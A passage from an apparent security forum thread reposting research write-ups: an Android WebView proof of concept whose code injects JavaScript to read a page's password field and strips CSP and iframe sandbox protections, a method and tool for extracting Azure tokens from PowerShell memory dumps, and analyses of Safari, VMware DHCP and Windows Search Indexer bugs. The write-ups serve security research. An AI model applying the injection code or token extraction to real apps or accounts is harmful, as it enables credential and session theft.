    03-28 17:29:28.372 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-JkQD9ejf-ohUEh1Jr6C22l1s4TUkBIPWNmho0FNLGr0='), or a nonce ('nonce-...') is required to enable inline execution.
    03-28 17:29:28.396 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.
    

    BullyApp still injected XSS payload in the vulnerable name parameter (we left it there to ensure that CSP was still in action). The above logs are a result & proof of that.

    Code snippet from BullyGiant that does the trick:

            ...
            mywebview.setWebViewClient(new WebViewClient(){
                @Override
                public void onPageFinished(WebView view, String url) {
                    super.onPageFinished(view, url);
                    mywebview.loadUrl(
                            "javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ alert(\"injected 1\"); },false);"
                    );
                }
            });
            ...
    

    The above PoC shows execution of simple JS payload that just pops up an alert box. Any other more complex JS could be executed as well, like reading the contents of the password field on the page using the below payload

    var secret = document.getElementById("password").value; alert(secret);

    AppAwesome when accessed from BullyGiant that attempts to read the password field using the above payload:

    ss17.png CSP AppAwesome Page - Exploited XSS => Android Webview

    So the questions above get answered. Also, it is indicative of an even more interesting question now:

    Since BullyApp is in total control of the webview & thus the page loaded within it, would it also be able to modify the whole HTTP response itself ?

    We will tackle the above question with yet another example. In fact, this time we would talk about the second suggestion around iframe sandbox and see if the answer to the above question could be demoed with that. Also, we had left out the whole X-XSS-Protection header thing for later. That part will also get covered with the following experiments.

    Iframe sandbox attribute

    Apps used in this section:

    1. AppAwesome Backend (without CSP & with iframe sandbox)
    2. AppAwesome Backend (without CSP & with iframe sandbox relaxed)
    3. BullyGiant

    AppAwesome, that has no CSP headers, that has X-XSS-Protection relaxed & has the below sandbox attributes

    sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"
    

    when loaded in the browser:

    ss17-1.png AppAwesome Page - Iframe Sandbox => Browser

    The child page has the form which when submitted displays the password on the checkout page inside the iframe as:

    ss18.png AppAwesome Page - Iframe Sandbox => Browser

    The Access button tries to read the password displayed inside iframe by reading the DOM of the page loaded in the iframe using the below JS

    ...
      	<script type="text/javascript">
      		function accessIframe()
      		{
      			document.getElementById('myIframe').style.background = "green"  			
      			alert(document.getElementById('myIframe').contentDocument.getElementById('data').innerText);
      		}
      	</script>
    ...
    

    Note that even in the absence of CSP headers clicking the Access button gives:

    ss19.png AppAwesome Page - Iframe Sandbox => Browser

    The console message is:

    TypeError: document.getElementById(...).contentDocument is null
    

    This happens because of the iframe's sandbox attribute. The iframe sandbox can relaxed by using:

    <iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-same-origin allow-top-navigation allow-forms allow-popups">
    

    AppAwesome, with relaxed iframe sandbox attribute, allows the JS in the parent page to access the iframe's DOM, thus producing the alert box as expected, with the mysecret value:

    ss20.png AppAwesome Page - Iframe Sandbox => Browser

    Also, just a side note, using the below would have also relaxed the sandbox to the exact same effect as has also been mentioned here:

    <iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-scripts allow-same-origin allow-top-navigation allow-forms allow-popups">
    

    Repeating the same experiment on android webview again produces the exact same results.

    AppAwesome, with relaxed iframe sandbox attribute when accessed from BullyGiant

    ss22.png AppAwesome Page - Iframe Sandbox Relaxed=> Android Webview

    AppAwesome, that has no CSP headers, that has X-XSS-Protection relaxed & has the below sandbox attributes

    sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"
    

    when accessed from BullyGiant:

    ss21.png AppAwesome Page - Iframe Sandbox => Android Webview

    The error message in the console is:

    03-29 15:18:38.292 11081-11081/com.example.webviewinjection D/WebView Console Error:: Uncaught SecurityError: Failed to read the 'contentDocument' property from 'HTMLIFrameElement': Sandbox access violation: Blocked a frame at "http://192.168.1.34:31337" from accessing a frame at "http://192.168.1.34:31337".  The frame being accessed is sandboxed and lacks the "allow-same-origin" flag.
    

    Now if BullyGiant were to bypass the above restriction, like it did in the case of CSP bypass, it could again take the same route of injecting some javascript inside the iframe itself after the checkout page is loaded.

    Note: I haven't personally tried this approach, but conceptually it should work. Too lazy to do that right now !

    But instead of doing that what if BullyApp were to take an even simpler approach to bypassing everything once & for all? Since the webview is under the total control fo BullyGiant could it not intercept the response before rendering it on the webview and remove all the trouble making headers altogether?

    Manipulation of the HTTP response

    Apps used in this section:

    1. AppAwesome Backend (with all protection mechanisms in place)
    2. BullyGiant (that bypasses all the above mechanisms)
    3. BullyGiant app with a toast

    Let's make this case the most secure out of all the previous ones. So this time the AppAwesome implements all secure mechanisms on the page. Below is a list of such changes:

    1. It uses CSP => so that no unwanted JS (inline or injected) could be executed.
    2. It uses strict iframe sandbox attributes => so that the parent page can not access the contents of the iframe despite them being from the same domain.
    3. It does not set the X-XSS-Protection: 0 header => this was an assumption we had made above for the sake of our demos. In the real world, an app that wishes to avoid an XSS scenario would deploy every possible/feasible mechanism to prevent it from happening. So AppAwesome now does not return this header at all.
    4. It does not have the Access button on the DOM with the inline JS => again something that we had used in few of our (most recent) previous examples for the sake of our demo. In the real world, in the context of our story, it would not make sense for AppAwesome to leave an Access button with the supporting inline JS to access the iframe.

    AppAwesome when accessed from the browser:

    ss21-3.png AppAwesome Page - FullBlown => Browser

    Notice that all the security measures mentioned in the pointers above are implemented. CSP headers are in place, there's no Access button or the supporting inline JS, no X-XSS-Protection header & the strict iframe sandbox attribute is present as well.

    BullyGiant handles all of the above trouble makers by handling everything before any response is rendered onto the webview at all,

    catBoss.jpg AppAwesome 0 BullyGiant 1 !

    AppAwesome when accessed from BullyGiant:

    ss22-1.png AppAwesome Page - FullBlown => Android Webview

    Notice that the X-XSS-Protection: 0 header has been added ! The CSP header is no longer present ! And there's (the old familiar) brand new Access button on the page as well. Clicking the Access button after the form inside the iframe is loaded gives:

    ss25.png AppAwesome Page - FullBlown => Android Webview

    Code snippet from BullyGiant that does all the above trick:

    ...
    class ChangeResponse implements Interceptor {
        @Override public Response intercept(Interceptor.Chain chain) throws IOException {
            Response originalResponse = chain.proceed(chain.request());
            String responseString = originalResponse.body().string();
            Document doc = Jsoup.parse(responseString);
            doc.getElementById("myIframe").removeAttr("sandbox");
            MediaType contentType = originalResponse.body().contentType();
            ResponseBody body = ResponseBody.create(doc.toString(), contentType);
    
            return originalResponse.newBuilder()
                    .body(body)
                    .removeHeader("Content-Security-Policy")
                    .header("X-XSS-Protection", "0")
                    .build();
        }
    };
    ...
    ...
        private WebResourceResponse handleRequestViaOkHttp(@NonNull String url) {
            try {
                final OkHttpClient client = new OkHttpClient.Builder()
                        .addInterceptor(new LoggingInterceptor())
                        .addInterceptor(new ChangeResponse())
                        .build();
    
                final Call call = client.newCall(new Request.Builder()
                        .url(url)
                        .build()
                );
    
                final Response response = call.execute();
                return new WebResourceResponse("text/html", "utf-8",
                        response.body().byteStream()
                );
            } catch (Exception e) {
                return null; // return response for bad request
            }
        }
    ...
    ...
           mywebview.setWebViewClient(new WebViewClient(){
                @SuppressWarnings("deprecation") // From API 21 we should use another overload
                @Override
                public WebResourceResponse shouldInterceptRequest(@NonNull WebView view, @NonNull String url) {
                    return handleRequestViaOkHttp(url);
                }
    ...
    

    What the above does is intercept the HTTP request that the webview would make & pass it over to OkHttp, which then handles all the HTTP requests & response from that point on, before finally returning back the modified HTTP response back to the webview.

    Ending note:

    Before we end, a final touch. BullyGiant was able to access the whole of the page loaded inside webview. This was demoed using JS alerts on the page itself. The content read from the webview could actually also be displayed as native toast messages, to make it more convincing for the business leaders (or anyone else), accentuating that the sensitive details from AppAwesome are actually leaked over to BullyGiant.

    AppAwesome when accessed from BullyGiant:

    ss26.png AppAwesome Page - FullBlown => Android Webview - Raising a toast!

    Conclusion

    Theoretically since the webview is under total control of the underlying android app, it is wise to not share any sensitive data on the page getting loaded inside the webview.

    Collected on the way

    git worktrees
    what are git tags & how to maintain different versions using tags
    creating git tags
    checking out git tags
    pushing git tags
    tags can be viewed simply with git tag
    git tags can not be committed to => For any changes to a tag, commit the changes on the or a new branch and then make a tag out of it. Delete the olde tag after that if you want
    deleting a branch local & remote
    rename a branch local & remote
    adding chrome console messages to adb logs
    chrome's remote debugging feature

     

    Sursa: http://www.nuckingfoob.me/android-webview-csp-iframe-sandbox-bypass/index.html

    • Upvote 1
  7. AzureTokenExtractor

    Extracts Azure authentication tokens from PowerShell process minidumps. More information on Azure authentication tokens and the process for using this tool, check out the corresponding blog post at https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2/.

    Usage

    USAGE:
      python3 azure-token-extractory.py [OPTIONS]
    
    OPTIONS:
      -d, --dump        Target minidump file
      -o, --outfile     File to save extracted Azure context
    

     

    Sursa: https://github.com/LaresLLC/AzureTokenExtractor

  8. Hunting Azure Admins for Vertical Escalation: Part 2

     

     

    This post is part 2 in the Hunting Azure Admins for Vertical Escalation series. Part 1 of this series detailed the usage and functionality of Azure authentication tokens, file locations that cache the tokens during a user session (“%USERPROFILE%\.Azure\TokenCache.dat”), methods for locating user exported Azure context files containing tokens, and leveraging them to bypass password authentication, as well as, multi-factor authentication. This blog post will focus on methodology to extract Azure authentication tokens when the end-user is disconnected and hasn’t exported an Azure context file.

    Disconnected Azure PowerShell Sessions

    When a user connects to Azure from PowerShell, a TokenCache.dat file is created and populated with the user’s Azure authentication token. This is detailed at great lengths in Part 1. However, if the user disconnected their Azure session, the TokenCache.dat file is stripped of the token. So, obtaining an Azure cached token from the TokenCache.dat file requires an active logged-in session.

    1-azadmin-connect-query-disconnect.png

    2-token-dat-empty-after-disconnect.png

    So, what can be done in a scenario where the Azure PowerShell session is disconnected, and the user hasn’t saved an Azure context file to disk?

    PowerShell Process Memory

    Thinking about traditional Windows credential theft and lateral movement brought to mind the LSASS.exe process and Mimikatz. In short, Windows has historically stored hashed and cleartext account credentials in the LSASS.exe process memory space and penetration testers have leveraged tools like Mimikatz to extract those credentials. This has gone on for years and has forced Microsoft into developing new security controls around the storage and access of credentials in Windows. On newer Windows systems, you will likely only extract hashed credentials from accounts that are actively logged onto the machine, as Windows has improved its scrubbing of credentials from memory after a user disconnects.

    This leads to the PowerShell process and identifying information it maintains in memory. Let’s start by dumping the PowerShell process memory to disk in minidump format.

    3-dump-powershell-process-to-minidump-fi

    Although we used a custom tool, SnappyKatz, to dump the PowerShell process memory other publicly available tools exist that can do this, such as, ProcDump from the Sysinternals Suite. We can then leverage our favorite hex editor to explore the contents of the dump. Referring back to the contents inside the TokenCache.dat file, we can quickly search for keywords to locate the Azure context Json in the dump.

    4-locating-azure-context-json-in-process

    This is great, but the required CacheData field that would contain the base64 encoded cached token was empty. At first, it was thought the field was empty because the session had been disconnected and due diligence had been done on the part of Microsoft to remove sensitive information from memory. In true Microsoft fashion, the missing cached token data was identified, in full, at a different offset in the dump.

    5-locating-cached-token-in-process-dump.

    We had now located the two pieces of information needed to reconstruct an Azure context file. To create the context file, we saved the JSON context data found at the first location to a file and populated the CacheData field with the base64 encoded token cache located at the second location.

    Automating Extraction

    In order to save a tremendous amount of time on engagements, we created a tool in Python that automates the extraction of required data and properly exports it to a usable Azure context JSON file.

    6-extract-context-and-token-then-export.

    This tool produces the following Azure context JSON output:

    7-azure-context-output.png

    The last step is to import the extracted Azure context file and see if we are able to access Azure.

    8-import-and-use-extracted-azure-context

    As we can see, Azure access has been obtained, leveraging disconnected session tokens extracted from PowerShell process memory. To make it easy to replicate our findings, we’ve published the AzureTokenExtractor tool to extract Azure authentication tokens from PowerShell process minidumps.

    We hope you have enjoyed this blog post. Keep checking back as we add more research, tool, and technique-related posts in the future!

     

    Sursa: https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2

  9. iPhone Camera Hack

    I discovered a vulnerability in Safari that allowed unauthorized

    websites to access your camera on iOS and macOS

     

    Imagine you are on a popular website when all of a sudden an ad banner hijacks your camera and microphone to spy on you. That is exactly what this vulnerability would have allowed.

     

    This vulnerability allowed malicious websites to masquerade as trusted websites when viewed on Desktop Safari (like on Mac computers) or Mobile Safari (like on iPhones or iPads).

     

    Hackers could then use their fraudulent identity to invade users' privacy. This worked because Apple lets users permanently save their security settings on a per-website basis.

     

    If the malicious website wanted camera access, all it had to do was masquerade as a trusted video-conferencing website such as Skype or Zoom.

    badads.png

    Is an ad banner watching you?

     

    I posted the technical details of how I found this bug in a lengthy walkthrough here.

     

    My research uncovered seven zero-day vulnerabilities in Safari (CVE-2020-3852, CVE-2020-3864, CVE-2020-3865, CVE-2020-3885, CVE-2020-3887, CVE-2020-9784, & CVE-2020-9787), three of which were used in the kill chain to access the camera.

     

    Put simply - the bug tricked Apple into thinking a malicious website was actually a trusted one. It did this by exploiting a series of flaws in how Safari was parsing URIs, managing web origins, and initializing secure contexts.

     

    If a malicious website strung these issues together, it could use JavaScript to directly access the victim's webcam without asking for permission. Any JavaScript code with the ability to create a popup (such as a standalone website, embedded ad banner, or browser extension) could launch this attack.

     

    I reported this bug to Apple in accordance with the Security Bounty Program rules and used BugPoC to give them a live demo. Apple considered this exploit to fall into the "Network Attack without User Interaction: Zero-Click Unauthorized Access to Sensitive Data" category and awarded me $75,000.

     

    The below screen recording shows what this attack would look like if clicked from Twitter.

    macos-poc.gif
    ios-poc.gif

    * victim in screen recording has previously trusted skype.com

     

    Sursa: https://www.ryanpickren.com/webcam-hacking-overview

  10. Filtering the Crap, Content Security Policy (CSP) Reports

    13 days ago

    Stuart Larsen #article


     

    It's pretty well accepted that if you collect Content Security Policy (CSP) violation reports, you're going to have to filter through a lot of confusing and unactionable reports.

    But it's not as bad as it used to be. Things are way better than they were six years ago when I first started down the CSP path with Caspr. Browsers and other User Agents are way more thoughtful on what and when they report. And new additions to CSP such as "script-sample" have made filtering reports pretty manageable.

    This article will give a quick background, and then cover some techniques that can be used to filter Content Security Policy reports.

    What is a Content Security Policy report?

    If you're new to Content Security Policy, I'd recommend checking out An Introduction To Content Security Policy first.

    Content Security Policy has a nifty feature called report-uri. When report-uri is enabled the browser will send a JSON blob whenever the browser detects a violation from the CSP. (For more info: An Introduction to report-uri). That JSON blob is the report.

    Here's a random violation report from my personal website https://c0nrad.io:

    {
     

    Report: Violation report from c0nrad.io on an inline style

    The report has a number of tasty details:

    • blocked-uri: inline. The blocked-uri was an 'inline' resource
    • violated-directive: style-src-elem. The violated directive was a CSS style element (it means <style> block as opposed to "style=" attr (attribute) on an HTML element)
    • source-file / line-number: https://c0nrad.io/ / 8. The inline resource came from file https://c0nrad.io on line 8. If you view-source of https://c0nrad.io, it's still there
    • script-sample: .something { width: 100%} 'The first 40 characters are .something { width :100%}.

    These reports are a miracle when getting started with CSP. You can use them to quickly determine where your policy is lacking. You can even use it to build new policies from scratch. It's actually how tools like CSP Generator automatically build new content security policies. Just by parsing these reports.

    Why filter Content Security Policy reports?

    If the violation reports are so amazing, why do we want to filter them? It seems a little counter intuitive at first, but the sad reality is that not all reports are created equal.

    Here's some of the inline reports that Csper's has received on it's own policy. Only three of them are from a real inline script in Csper (which I purposely injected):

    Sample CSP Violation Reports

    Figure: Sample violation reports generated by Content Security Policy

    For more fun, I highly recommend checking out this amazing list of fun CSP reports: csp-wtf

    What's frustrating is that a large percentage of reports received from CSP are unactionable. They're not really related to the website. These "unactionable" can come from a lot of different places. The most common is extensions and addons. There's also ads, content injected from ISPs, malware, corporate proxies, custom user scripts, browser quirks, and a sprinkle of serious "wtf" reports.

    Filtering Techniques

    The goal of filtering is to remove the unactionable reports, so that you're only left with reports that should be looked into. But of course you don't want to filter too much such that you lose reports that really should of been analyzed (such as an XSS on your website).

    They are somewhat listed in order of importance+ease+reliability.

    Blacklists

    The easiest way to filter out a huge number of reports by applying some simple blacklisting rules.

    I think everyone either directly or indirectly has taken a page from Neil Matatall's/Twitter's book back in 2014: https://matatall.com/csp/twitter/2014/07/25/twitters-csp-report-collector-design.html

    Some more lists:

    Depending on your use-case, it maybe be better to classify them, and then selectively filter out those classifications later (just incase you actually need the reports). Some buckets I found to work well are 'extension', 'unactionable'.

    But this technique alone cuts out ~50% of the weird reports.

    Malformed Reports

    Another easy way to filter reports is to make sure they have all the necessary fields (and that fields like effective-directive are actually a real directive). If it's missing some fields it's probably not worth time investigating. It's probably a very old or incomplete user agent. All the fields can be found in the CPS3 spec.

    {
     

    You could argue that maybe the users being XSS'ed are on a very old browser that doesn't correctly report on all fields, and so if you filter them out you're going to miss the XSS that needs to be patched. Which is definitely fair. But with browser auto-updating I think/hope most people are on a decently recent browser. And also (this should not be a full excuse not to care), but people on very outdated browsers probably have a large number of other browser problems to worry about. And also if multiple users are being XSS's, the majority of them are probably on a competent user agent that will report all the fields, so it will be picked up.

    It comes down to how much time/resources an organization has to dedicate to CSP. Something is better than nothing. And this case, this something can save you hours, for a pretty small chance of something falling through the cracks. I recommend adding a label to reports that are missing important fields (or using egregious values) to be categorized as 'malformed', and just kept to the side so they can be skimmed every once in awhile.

    Bots

    Another easy way to filter out 'unactionable' reports is to check if the User Agents belongs to a Bot. A number of web scrapers inject javascript into the pages they are analyzing. (The bots also have CSP enabled). Which seams silly at first, but they're probably just using headless chrome or something.

    Some example user agents:

    Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BuiltWith/1.0; +http://builtwith.com/biup) Chrome/60.0.3112.50 Safari/537.36
    Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/61.0.3163.59 Safari/537.36 Prerender (+https://github.com/prerender/prerender)
    Mozilla/5.0 (compatible; woorankreview/2.0; +https://www.woorank.com/)
    Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)
    
     

    Since these UserAgents inject their own javascript not related to the website, it's not worth the time investigating them.

    Script-Sample

    If report-sample is enabled (which I highly recommend it be enabled), you can start filtering out reports on the first 40 characters in the script-sample field.

    A good starting point is the csp-wtf list.

    A quick note of caution though for websites running in 'Content-Security-Policy-Report-Only'. If you automatically filter out anything that matches these script-samples, an attacker could attempt to use an XSS that starts with one of those strings to avoid detection. If it's a DOM based XSS it'll be very hard to determine what is an injection vs what is a DOM based XSS (more on that later).

    Browser Age

    One filtering technique that Csper started supporting this week is filtering on Browser Age. Older browsers (and less common browsers) have some fun CSP quirks (and sadly probably more malware, toolbars, etc, which all cause unactionable reports), so if you're short on resources, they reports should probably be looked at less.

    So when a report is received, you take the User Agent + Version, look up the release date of that User Agent, and if it's older than some time period (2 years) label it as an older user agent. This cuts out like 15% of the reports.

    The same argument still holds of "what if the XSS victim is using an old browser". Again I think that it is up to the website's security maturity and available resources to determine what an appropriate level of effort is. But for the average website, giving less attention to the >2yrs old browsers but giving more attention to the rest of the reports, instead of being over flooded by reports and doing nothing, is infinitely better. The reports are still there for those who want to look at them.

    line-number / column-number analysis

    Modern browsers make a good attempt to add Line-Number/Column-Number to the violation reports. (The PR for chrome).

    So when there's a resource that doesn't have a line-number/column-number, it's a good cause for an eyebrow raise. A lot of reports also use "1' or "0" as the line number. These can also be a great signal for something odd.

    I found that usually a line number of 0/1 signifies that the resources was "injected" after the fact. (As in it was not part of the original HTML). This could be things like SPAS (angular/react) injecting resources, or browsers injecting content scripts, or a DOM based XSS.

    Unfortunately (at least for modern chrome), I couldn't find a way to determine the difference between a DOM based XSS, and something injected by a browser script.

    For example here's a report of a DOM based XSS I injected myself through an angular innerHTML. It looks pretty much the same as a lot of extension injections with a line-number of 1:

    {
     

     

    But it is still interesting when a report has a line-number of 1. So inline reports can either be split into categories of "inline" or "injected". The injected will contain most of the browser stuff, but could also contain DOM based XSS's, so still needs to be looked at.

    I hope in the future that source-file will better accurately reflect where the javascript came from, and we can filter out all extension stuff with great ease.

    SourceFile / DocumentURI

    In a somewhat related vein, stored or reflected XSS's should have a matching sourcefile/documenturi (obviously not the case for DOM or more exotic XSS's). In some of the odd reports the source file will be from something external (such as a script from Google Translate).

    If you're specifically looking to detect a stored/reflected XSS, a mismatch can be a nice indication that maybe the report isn't as useful.

    Somewhat related, Firefox also doesn't include sourcefile on eval's from extensions, which can help reduce eval noise. (They can be placed in the extension bucket).

    Other Ideas

    Similar Reports From Newer Browser Versions

    Browsers are getting way better at fully specifying what content came from an extension. For example below it's pretty obvious that this report is from an extension (thanks to the source-file starting with moz-extension). This report came from a Useragent with Firefox/Windows/Desktop released 22 days ago.

    {
     

    The next report most likely came from the same extension, but from the report it's not obvious where the report came from. This UserAgent is Firefox/Windows/Desktop but released 9 months ago.

    {
      "csp-report": {
        "blocked-uri": "inline",
        "column-number": 1,
        "document-uri": "https://csper.io/blog/other-csp-security",
        "line-number": 1,
        "original-policy": "default-src 'self'; connect-src 'self' https://*.hotjar.com https://*.hotjar.io https://api.hubspot.com https://forms.hubspot.com https://rs.fullstory.com https://stats.g.doubleclick.net https://www.google-analytics.com wss://*.hotjar.com; font-src 'self' data: https://script.hotjar.com; frame-src 'self' https://app.hubspot.com https://js.stripe.com https://vars.hotjar.com https://www.youtube.com; img-src 'self' data: https:; object-src 'none'; script-src 'report-sample' 'self' http://js.hs-analytics.net/analytics/ https://edge.fullstory.com/s/fs.js https://js.hs-analytics.net/analytics/ https://js.hs-scripts.com/ https://js.hscollectedforms.net/collectedforms.js https://js.stripe.com/v3/ https://js.usemessages.com/conversations-embed.js https://script.hotjar.com https://static.hotjar.com https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/js; style-src 'report-sample' 'self' 'unsafe-inline'; base-uri 'self'; report-uri https://csper-prod.endpoint.csper.io/",
        "referrer": "",
        "script-sample": "(() => {\n        try {\n            // co…",
        "source-file": "https://csper.io/blog/other-csp-security",
        "violated-directive": "script-src"
      }
    }
     

    It's not perfect, but it may be possible to group similar reports together and perform the analysis on the latest user agent. But you have to be careful that you don't aggressively group reports together to the point where an attacker could attempt to smuggle XXS's that start with (() => {\n try {\n // co to avoid detection on report-only deployments.

    Hopefully as everyone moves to very recent browsers we can just filter on the source-file. There was also a little chatter about adding the sha256-hash to the report, that would also make this infinitely more feasible (but, people would need to be on more recent versions of their browsers to send the new sha256, and by that point we'll already have the moz-extension indicator in the source-file).

    'Crowd Sourced' Labeling

    Another idea that I've been mulling over is 'Crowd Sourced' labeling. What if people could mark reports as "unactionable" (somewhat like the csp-wtf list)? Or "this report doesn't apply to my project". These reports be aggregated and then displayed to other users of a report-uri endpoint as "other users have marked this report as unactionable". For people just getting started with CSP this could be nice validation to ignore a report.

    Or specifically if there's XSS's with a known payload, people could mark as "this was a real XSS", and other people get that indication when there's a similar report in their project.

    Due to my privacy/abuse concerns this idea has been kicked down the road. It would need to be rock solid. As of right now (for csper) there is no way for a customer to glean information about another customer, and obviously this is how things should be. But maybe in the future there could be an opt-in anonymized feature flag for this. But not for many months at least. If this is interesting to you (because it's a good idea, or a terrible idea, I'd love to hear your thoughts!) stuart@csper.io.

    Conclusion

    A dream I have is that one day most everyone could actually use Content-Security-Policy-Report-Only and get value with almost no work. If individuals are using the latest user agents, and if an endpoint's classification is good enough, websites could roll out CSP in report-only mode for a few weeks to establish a baseline of known inline reports and their positions, and then the endpoint will know where expected inline resources exist, and then only alert website owners on new reports it thinks that are an XSS. XSS detection for any website for almost no work.

    We're not there yet. But browsers and getting better at what they send, and classification of reports is getting easier.

    I hope this was useful! If you have any ideas or comments I would love to hear them! stuart at csper.io.

    Automatically Generating Content Security Policy

    A guide to automatically generating content security policy (CSP) headers. Csper builder collection csp reports using report-uri to generate/build a policy online in minutes.

    Content Security Policy (CSP) report-uri

    Technical reference on content security policy (CSP) report-uri. Includes example csp reports, example csp report-uri policy, and payload

    Other Security Features of Content Security Policy

    Other security features of content security policy including upgrade-insecure-requests, block-all-mixed-content, frame-ancestors, sandbox, form-actions, and more

    Sursa: https://csper.io/blog/csp-report-filtering

  11. CVE-2020-3947: Use-After-Free Vulnerability in the VMware Workstation DHCP Component

    April 02, 2020 | KP Choubey

    Ever since introducing the virtualization category at Pwn2Own in 2016, guest-to-host escapes have been a highlight of the contest. This year’s event was no exception. Other guest-to-host escapes have also come through the ZDI program throughout the year. In fact, VMware released a patch for just such a bug less than a week prior to this year’s competition. In this blog post, we look into CVE-2020-3947, which was submitted to the ZDI program (ZDI-20-298) in late December by an anonymous researcher. The vulnerability affects the DHCP server component of VMware Workstation and could allow attackers to escalate privileges from a guest OS and execute code on the host OS.

    Dynamic Host Configuration Protocol (DHCP)

    Dynamic Host Configuration Protocol (DHCP) is used to dynamically assign and manage IP addresses by exchanging DHCP messages between a DHCP client and server. DHCP messages include DHCPDISCOVER, DHCPOFFER, DHCPRELEASE, and several others. All DCHP messages begin with the following common header structure:

     

    Figure 1 - DHCP Header structure

    The Options field of a DHCP message contains a sequence of option fields. The structure of an option field is as follows:

     

    Figure 2 - Option Field Structure

    The optionCode field defines the type of option. The value of optionCode is 0x35 and 0x3d for the DHCP message type and client identifier options, respectively.

    A DHCP message must contain one DHCP message type option. For the DHCP message type option, the value of the optionLength field is 1 and the optionData field indicates the message type. A value of 1 indicates a DHCPDISCOVER message, while a value of 7 indicates a DHCPRELEASE message. These are the two message types that are important for this vulnerability. DHCPDISCOVER is broadcast by a client to get an IP address, and the client sends DHCPRELEASE to relinquish an IP address. 

    The Vulnerability

    In VMWare Workstation, the vmnetdhcp.exe module provides DHCP server service to guest machines. This startup entry is installed as a Windows service. The vulnerable condition occurs when sending a DHCPDISCOVER message followed by a DHCPRELEASE message repeatedly to a vulnerable DHCP server.

    During processing of a DHCPRELEASE message, the DHCP server calls vmnetdhcp! supersede_lease (vmnetdhcp+0x3160). The supersede_lease function then copies data from one lease structure to another. A lease structure contains information such as an assigned client IP address, client hardware address, lease duration, lease status, and so on. The full lease structure is as follows:

     

    Figure 3 - Lease Structure

    For this vulnerability, the uid and uid_len fields are important. The uid field points to a buffer containing the string data from the optionData field of the client identifier option. The uid_len field indicates the size of this buffer.

    supersede_lease first checks whether the string data pointed by the respective uid fields of the source and destination lease are equal. If these two strings match, the function frees the buffer pointed to by the uid field of the source lease. Afterwards, supersede_lease calls write_lease (vmnetdhcp+016e0), passing the destination lease as an argument, to write the lease to an internal table.

     

    Figure 4 – Compare the uid Fields

     

    Figure 5 - Frees the uid Field

    In the vulnerable condition, meaning when a DHCPDISCOVER message followed by a DHCPRELEASE message is repeatedly received by the server, the respective uid fields of the source and destination lease structures actually point to the same memory location. The supersede_lease function does not check for this condition. As a result, when it frees the memory pointed to by the uid field of the source lease, the uid pointer of the destination lease becomes a hanging pointer. Finally, when write_lease accesses the uid field of the destination lease, a use-after-free (UAF) condition occurs. 

     

    Figure 6 - Triggering the Bug

    The Patch

    VMware patched this bug and two lesser severity bugs with VMSA-2020-004. The patch to address CVE-2020-3947 contains changes in one function: supersede_lease. The patch comparison of supersede_lease in VMnetDHCP.exe version 15.5.1.50853 versus version 15.5.2.54704 is as follows:

     

    Figure 7 - BinDiff Patch Comparison

    In the patched version of supersede_lease, after performing the string comparison between the respective uid fields of the source and destination leases, it performs a new check to see if the respective uid fields are actually referencing the same buffer. If they are, the function skips the call to free.

    Since there are no workarounds listed, the only way to ensure you are protected from this bug is to apply the patch.

    Despite being a well understood problem, UAF bugs continue to be prevalent in modern software. In fact, 15% of the advisories we published in 2019 were the result of a UAF condition. It will be interesting to see if that trend continues in 2020.

    You can find me on Twitter @nktropy, and follow the team for the latest in exploit techniques and security patches.

    Sursa: https://www.zerodayinitiative.com/blog/2020/4/1/cve-2020-3947-use-after-free-vulnerability-in-the-vmware-workstation-dhcp-component

  12. Analyzing a Windows Search Indexer LPE bug

    March 26, 2020 - SungHyun Park @ Diffense

    Introduction

    The Jan-Feb 2020 security patch fixes multiple bugs in the Windows Search Indexer.

    cve

    Many LPE vulnerabilities in the Windows Search Indexer have been found, as shown above1. Thus, we decided to analyze details from the applied patches and share them.

    Windows Search Indexer

    Windows Search Indexer is a Windows Service that handles indexing of your files for Windows Search, which fuels the file search engine built into windows that powers everything from the Start Menu search box to Windows Explorer, and even the Libraries feature.

    Search Indexer helps direct the users to the service interface through GUI, indexing options, from their perspectives, as indicated below.

    indexing_option

    All the DB and temporary data during the indexing process are stored as files and managed. Usually in Windows Service, the whole process is carried out with NT AUTHORITY SYSTEM privileges. If the logic bugs happen to exist due to modifying file paths, it may trigger privilege escalation. (E.g. Symlink attack)

    We assumed that Search Indexer might be the vulnerability like so, given that most of the vulnerabilities recently occurred in Windows Service were LPE vulnerabilities due to logic bugs. However, the outcome of our analysis was not that; more details are covered afterward.

    Patch Diffing

    The analysis environment was Windows7 x86 in that it had a small size of the updated file and easy to identified the spot differences. We downloaded both patched versions of this module.

    They can be downloaded from Microsoft Update Catalog :

    • patched version (January Patch Tuesday) : KB45343142
    • patched version (February Patch Tuesday) : KB45378133

    We started with a BinDiff of the binaries modified by the patch (in this case there is only one: searchindexer.exe)

    diffing_2

    Most of the patches were done in the CSearchCrawlScopeManager and CSearchRoot class. The former was patched in January, and then the latter was patched the following month. Both classes contained the same change, so we focused on CSearchRoot patched.

    The following figure shows that primitive codes were added, which used a Lock to securely access shared resources. We deduced that accessing the shared resources gave rise to the occurrence of the race condition vulnerability in that the patch consisted of putter, getter function.

    image

    image

    How to Interact with the Interface

    We referred to the MSDN to see how those classes were used and uncovered that they were all related to the Crawl Scope Manager. And we could check the method information of this class.

    And the MSDN said4 :

